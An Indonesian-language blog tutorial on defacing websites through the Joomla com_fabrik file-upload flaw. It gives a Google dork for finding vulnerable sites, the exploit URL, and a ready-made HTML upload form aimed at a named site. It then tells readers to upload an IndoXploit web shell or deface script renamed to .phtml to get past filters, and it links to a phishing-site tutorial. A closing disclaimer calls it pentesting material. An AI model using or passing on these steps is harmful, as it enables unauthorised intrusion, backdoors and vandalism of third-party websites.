Deface Metode Com_fabrik Upload Shell With CSRF

Deface Metode Com_fabrik Upload Shell With CSRF

Assalamualaikum Wr.Wb
Baiklah bertemu lagi dengan saya Adewa (Mr.Adewa)
Terimakasih telah berkunjung ke web sederhanan ini. Hehe
Kali ini saya akan memberikan Tutorial Deface Metode Com_fabrik Upload Shell With CSRF

Baca juga
http://adewa-official.blogspot.co.id/2017/12/deface-metode-kcfinder-file-upload-in.html

Sebelum deface sebaiknya kita mempersiapkan alat dan bahan
-Shell Backdoor IndoXploit OR Adewamini
-Script Deface (Saya rasa udah punya sendiri-sendiri)
-Dork
-Inurl:index.php?Option=Com_Fabrik
-Exploit
/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
-CSRF
 Comot langsung Di Sini
<form method="POST" action="http://site.co.il/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data">
 <input type="file" name="file" />
 <button>
  Upload
 </button>
</form>
1. Dorking ke gogle atau image seperti ngedork biasa. Kembangkan dork di atas biar menjadi jos


2. Masukkan exploit Contoh www.site.com//index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

3. Jika Vuln akan ada {"filepath":null,"uri":null} Seperti ini


4. Buka csrf pastekan atau tempel web dan exploit yg kita dapat


5. Buka csrf menggunakan browser. Uploadkan Shell or Backdoor atau Script Deface kalian, Script backdoor harus di bypass dulu. Bypass menjadi phtml


Jika masih kurang jelas bisa Lihat tutor di bawah ini


Jangan lupa baca juga
http://adewa-official.blogspot.com/2017/12/cara-membuat-web-phising-send-email.html
Catatan. Saya Admin tidak pernah bertanggung jawab dengan apa yang kalian perbuat
Jika ada masalah jangan pernah menyalakan website ini 
Tutor ini di buat untuk mengetest/pentester suatu website apakah web itu memiliki bug apa enggak
Mungkin hanya itu kata kata yg bisa saya ucapkan 

Sekian dan Terimakasih
Wassalamualaikum Wr.Wb

Subscribe to receive free email updates:

0 Response to "Deface Metode Com_fabrik Upload Shell With CSRF"

Post a Comment